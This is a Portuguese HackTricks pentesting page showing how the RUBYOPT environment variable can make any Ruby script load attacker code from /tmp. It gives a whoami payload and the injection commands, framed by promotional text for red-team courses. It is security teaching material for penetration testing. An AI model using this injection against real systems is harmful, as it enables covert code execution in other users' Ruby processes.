HackTricksInjeção de Aplicações Ruby no macOS
Tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
RUBYOPT
Usando essa variável de ambiente, é possível adicionar novos parâmetros ao ruby sempre que ele for executado. Embora o parâmetro -e não possa ser usado para especificar código ruby a ser executado, é possível usar os parâmetros -I e -r para adicionar uma nova pasta ao caminho de bibliotecas a serem carregadas e então especificar uma biblioteca para carregar.
Crie a biblioteca inject.rb em /tmp:
puts `whoami`
Crie um script Ruby em qualquer lugar como:
puts 'Hello, World!'
Então, faça um script ruby arbitrário carregá-lo com:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Fato curioso, funciona mesmo com o parâmetro --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Tip
Aprenda e pratique Hacking AWS:
Aprenda e pratique Hacking GCP:Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.